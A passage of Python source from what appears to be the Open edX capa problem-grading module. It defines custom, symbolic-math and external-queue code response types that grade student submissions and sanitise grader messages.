self.context['overall_message'] = overall_message\n self.context['grade_decimals'] = grade_decimals\n\n # Otherwise, we do not recognize the dictionary\n # Raise an exception\n else:\n log.error(traceback.format_exc())\n _ = self.capa_system.i18n.gettext\n raise ResponseError(\n _(\"CustomResponse: check function returned an invalid dictionary!\")\n )\n\n else:\n\n # Returning any falsy value or the \"false\" string for \"ok\" gives incorrect.\n # Returning any string that includes \"partial\" for \"ok\" gives partial credit.\n # Returning any other truthy value for \"ok\" gives correct\n\n if str(ret).lower().strip() == \"false\" or not bool(ret):\n correct = 'incorrect'\n elif 'partial' in str(ret).lower().strip():\n correct = 'partially-correct'\n else:\n correct = 'correct'\n correct = [correct] * len(idset)\n\n # old version, no partial credit:\n # correct = ['correct' if ret else 'incorrect'] * len(idset)\n\n self.context['correct'] = correct\n\n def clean_message_html(self, msg): # lint-amnesty, pylint: disable=missing-function-docstring\n\n # If *msg* is an empty string, then the code below\n # will return \"\". To avoid this, we first check\n # that *msg* is a non-empty string.\n if msg:\n\n # When we parse *msg* using etree, there needs to be a root\n # element, so we wrap the *msg* text in tags\n msg = HTML('{msg}').format(msg=HTML(msg))\n\n # Replace < characters\n msg = msg.replace('<', '<')\n\n # Use etree to prettify the HTML\n msg = etree.tostring(fromstring_bs(msg), pretty_print=True).decode('utf-8')\n\n msg = msg.replace(' ', '')\n\n # Remove the tags we introduced earlier, so we're\n # left with just the prettified message markup\n msg = re.sub('(?ms)(.*)', '\\\\1', msg)\n\n # Strip leading and trailing whitespace\n return msg.strip()\n\n # If we start with an empty string, then return an empty string\n else:\n return \"\"\n\n def get_answers(self):\n \"\"\"\n Give correct answer expected for this response.\n\n use default_answer_map from entry elements (eg textline),\n when this response has multiple entry objects.\n\n but for simplicity, if an \"expect\" attribute was given by the content author\n ie then that.\n \"\"\"\n if len(self.answer_ids) > 1:\n return self.default_answer_map\n if self.expect:\n return {self.answer_ids[0]: self.expect}\n return self.default_answer_map\n\n def _handle_exec_exception(self, err):\n \"\"\"\n Handle an exception raised during the execution of\n custom Python code.\n\n Raises a ResponseError\n \"\"\"\n\n # Log the error if we are debugging\n msg = 'Error occurred while evaluating CustomResponse'\n log.warning(msg, exc_info=True)\n\n # Notify student with a student input error\n _, _, traceback_obj = sys.exc_info()\n raise ResponseError(str(err), traceback_obj)\n\n#-----------------------------------------------------------------------------\n\n\n@registry.register\nclass SymbolicResponse(CustomResponse):\n \"\"\"\n Symbolic math response checking, using symmath library.\n \"\"\"\n\n human_name = _('Symbolic Math Input')\n tags = ['symbolicresponse']\n max_inputfields = 1\n\n def setup_response(self):\n # Symbolic response always uses symmath_check()\n # If the XML did not specify this, then set it now\n # Otherwise, we get an error from the superclass\n self.xml.set('cfn', 'symmath_check')\n\n # Let CustomResponse do its setup\n super(SymbolicResponse, self).setup_response() # lint-amnesty, pylint: disable=super-with-arguments\n\n def execute_check_function(self, idset, submission):\n from symmath import symmath_check\n try:\n # Since we have limited max_inputfields to 1,\n # we can assume that there is only one submission\n answer_given = submission[0]\n\n ret = symmath_check(\n self.expect, answer_given,\n dynamath=self.context.get('dynamath'),\n options=self.context.get('options'),\n debug=self.context.get('debug'),\n )\n except Exception as err:\n log.error(\"oops in SymbolicResponse (cfn) error %s\", err)\n log.error(traceback.format_exc())\n _ = self.capa_system.i18n.gettext\n # Translators: 'SymbolicResponse' is a problem type and should not be translated.\n msg = _(\"An error occurred with SymbolicResponse. The error was: {error_msg}\").format(\n error_msg=err,\n )\n raise Exception(msg) # lint-amnesty, pylint: disable=raise-missing-from\n self.context['messages'][0] = self.clean_message_html(ret['msg'])\n self.context['correct'] = ['correct' if ret['ok'] else 'incorrect'] * len(idset)\n\n#-----------------------------------------------------------------------------\n\n## ScoreMessage named tuple ##\n## valid: Flag indicating valid score_msg format (Boolean)\n## correct: Correctness of submission (Boolean)\n## score: Points to be assigned (numeric, can be float)\n## msg: Message from grader to display to student (string)\n\nScoreMessage = namedtuple('ScoreMessage', ['valid', 'correct', 'points', 'msg'])\n\n\n@registry.register\nclass CodeResponse(LoncapaResponse):\n \"\"\"\n Grade student code using an external queueing server, called 'xqueue'.\n\n Expects 'xqueue' dict in LoncapaSystem with the following properties that are\n needed by CodeResponse::\n\n capa_system.xqueue = object with properties:\n interface: XQueueInterface object.\n construct_callback: Per-StudentModule callback URL constructor,\n defaults to using 'score_update' as the correct dispatch (function).\n default_queuename: Default queue name to submit request (string).\n }\n\n External requests are only submitted for student submission grading, not\n for getting reference answers.\n\n \"\"\"\n\n human_name = _('Code Input')\n tags = ['coderesponse']\n allowed_inputfields = ['textbox', 'filesubmission', 'matlabinput']\n max_inputfields = 1\n payload = None\n initial_display = None\n url = None\n answer = None\n queue_name = None\n\n def setup_response(self):\n \"\"\"\n Configure CodeResponse from XML. Supports both CodeResponse and ExternalResponse XML\n\n TODO: Determines whether in synchronous or asynchronous (queued) mode\n \"\"\"\n xml = self.xml\n # TODO: XML can override external resource (grader/queue) URL\n self.url = xml.get('url', None)\n\n # We do not support xqueue within Studio.\n if self.capa_system.xqueue is not None:\n default_queuename = self.capa_system.xqueue.default_queuename\n else:\n default_queuename = None\n self.queue_name = xml.get('queuename', default_queuename)\n\n # VS[compat]:\n # Check if XML uses the ExternalResponse format or the generic\n # CodeResponse format\n codeparam = self.xml.find('codeparam')\n assert codeparam is not None, \"Unsupported old format! without \"\n self._parse_coderesponse_xml(codeparam)\n\n def _parse_coderesponse_xml(self, codeparam):\n \"\"\"\n Parse the new CodeResponse XML format. When successful, sets:\n self.initial_display\n self.answer (an answer to display to the student in the LMS)\n self.payload\n \"\"\"\n grader_payload = codeparam.find('grader_payload')\n grader_payload = grader_payload.text if grader_payload is not None else ''\n self.payload = {\n 'grader_payload': grader_payload,\n }\n\n # matlab api key can be defined in course settings. if so, add it to the grader payload\n api_key = getattr(self.capa_system, 'matlab_api_key', None)\n if api_key and self.xml.find('matlabinput') is not None:\n self.payload['token'] = api_key\n self.payload['endpoint_version'] = \"2\"\n self.payload['requestor_id'] = self.capa_system.anonymous_student_id\n\n self.initial_display = find_with_default(\n codeparam, 'initial_display', '')\n _ = self.capa_system.i18n.gettext\n self.answer = find_with_default(codeparam, 'answer_display',\n _('No answer provided.'))\n\n def get_score(self, student_answers):\n _ = self.capa_system.i18n.gettext\n try:\n # Note that submission can be a file\n submission = student_answers[self.answer_id]\n except Exception as err:\n log.error(\n 'Error in CodeResponse %s: cannot get student answer for %s;'\n ' student_answers=%s',\n err, self.answer_id, convert_files_to_filenames(student_answers)\n )\n raise Exception(err) # lint-amnesty, pylint: disable=raise-missing-from\n\n # We do not support xqueue within Studio.\n if self.capa_system.xqueue is None:\n cmap = CorrectMap()\n cmap.set(self.answer_id, queuestate=None,\n msg=_('Error: No grader has been set up for this problem.'))\n return cmap\n\n # Prepare xqueue request\n #------------------------------------------------------------\n\n qinterface = self.capa_system.xqueue.interface\n qtime = datetime.strftime(datetime.now(UTC), xqueue_interface.dateformat)\n\n anonymous_student_id = self.capa_system.anonymous_student_id\n\n # Generate header\n queuekey = xqueue_interface.make_hashkey(\n str(self.capa_system.seed) + qtime + anonymous_student_id + self.answer_id\n )\n callback_url = self.capa_system.xqueue.construct_callback()\n xheader = xqueue_interface.make_xheader(\n lms_callback_url=callback_url,\n lms_key=queuekey,\n queue_name=self.queue_name\n )\n\n # Generate body\n if is_list_of_files(submission):\n # TODO: Get S3 pointer from the Queue\n self.context.update({'submission': ''})\n else:\n self.context.update({'submission': submission})\n\n contents = self.payload.copy()\n\n # Metadata related to the student submission revealed to the external\n # grader\n student_info = {\n 'anonymous_student_id': anonymous_student_id,\n 'submission_time': qtime,\n 'random_seed': self.context['seed'],\n }\n contents.update({'student_info': json.dumps(student_info)})\n\n # Submit request. When successful, 'msg' is the prior length of the\n # queue\n\n if is_list_of_files(submission):\n # TODO: Is there any information we want to send here?\n contents.update({'student_response': ''})\n (error, msg) = qinterface.send_to_queue(header=xheader,\n body=json.dumps(contents),\n files_to_upload=submission)\n else:\n contents.update({'student_response': submission})\n (error, msg) = qinterface.send_to_queue(header=xheader,\n body=json.dumps(contents))\n\n # State associated with the queueing request\n queuestate = {'key': queuekey,\n 'time': qtime, }\n\n cmap = CorrectMap()\n if error:\n _ = self.capa_system.i18n.gettext\n error_msg = _('Unable to deliver your submission to grader (Reason: {error_msg}).'\n ' Please try again later.').format(error_msg=msg)\n cmap.set(self.answer_id, queuestate=None, msg=error_msg)\n else:\n # Queueing mechanism flags:\n # 1) Backend: Non-null CorrectMap['queuestate'] indicates that\n # the problem has been queued\n # 2) Frontend: correctness='incomplete' eventually trickles down\n # through inputtypes.textbox and .filesubmission to inform the\n # browser to poll the LMS\n cmap.set(self.answer_id, queuestate=queuestate,\n correctness='incomplete', msg=msg)\n\n return cmap\n\n def update_score(self, score_msg, oldcmap, queuekey):\n \"\"\"Updates the user's score based on the returned message from the grader.\"\"\"\n (valid_score_msg, correct, points, msg) = self._parse_score_msg(score_msg)\n\n _ = self.capa_system.i18n.gettext\n\n if not valid_score_msg:\n # Translators: 'grader' refers to the edX automatic code grader.\n error_msg = _('Invalid grader reply. Please contact the course staff.')\n oldcmap.set(self.answer_id, msg=error_msg)\n return oldcmap\n\n correctness = 'correct' if correct else 'incorrect'\n\n # TODO: Find out how this is used elsewhere, if any\n self.context['correct'] = correctness\n\n # Replace 'oldcmap' with new grading results if queuekey matches. If queuekey\n # does not match, we keep waiting for the score_msg whose key actually\n # matches\n if oldcmap.is_right_queuekey(self.answer_id, queuekey):\n # Sanity check on returned points\n if points < 0: # lint-amnesty, pylint: disable=consider-using-max-builtin\n points = 0\n # Queuestate is consumed\n oldcmap.set(\n self.answer_id, npoints=points, correctness=correctness,\n msg=msg.replace(' ', ' '), queuestate=None)\n else:\n log.debug(\n 'CodeResponse: queuekey %s does not match for answer_id=%s.',\n queuekey,\n self.answer_id\n )\n\n return oldcmap\n\n def get_answers(self):\n anshtml = HTML('
    {}
    ').format(self.answer)\n return {self.answer_id: anshtml}\n\n def get_initial_display(self):\n \"\"\"\n The course author can specify an initial display\n to be displayed the code response box.\n \"\"\"\n return {self.answer_id: self.initial_display}\n\n def _parse_score_msg(self, score_msg):\n \"\"\"\n Grader reply is a JSON-dump of the following dict\n { 'correct': True/False,\n 'score': Numeric value (floating point is okay) to assign to answer\n 'msg': grader_msg }\n\n Returns (valid_score_msg, correct, score, msg):\n valid_score_msg: Flag indicating valid score_msg format (Boolean)\n correct: Correctness of submission (Boolean)\n score: Points to be assigned (numeric, can be float)\n msg: Message from grader to display to student (string)\n \"\"\"\n fail = (False, False, 0, '')\n try:\n score_result = json.loads(score_msg)\n except (TypeError, ValueError):\n log.error(\"External grader message should be a JSON-serialized dict.\"\n \" Received score_msg = %s\", score_msg)\n return fail\n if not isinstance(score_result, dict):\n log.error(\"External grader message should be a JSON-serialized dict.\"\n \" Received score_result = %s\", score_result)\n return fail\n for tag in ['correct', 'score', 'msg']:\n if tag not in score_result:\n log.error(\"External grader message is missing one or more required\"\n \" tags: 'correct', 'score', 'msg'\")\n return fail\n\n # Next, we need to check that the contents of the external grader message is safe for the LMS.\n # 1) Make sure that the message is valid XML (proper opening/closing tags)\n # 2) If it is not valid XML, make sure it is valid HTML.\n # Note: html5lib parser will try to repair any broken HTML\n # For example: will become .\n msg = score_result['msg']\n\n try:\n etree.fromstring(msg)\n except etree.XMLSyntaxError as _err:\n # If `html` contains attrs with no values, like `controls` in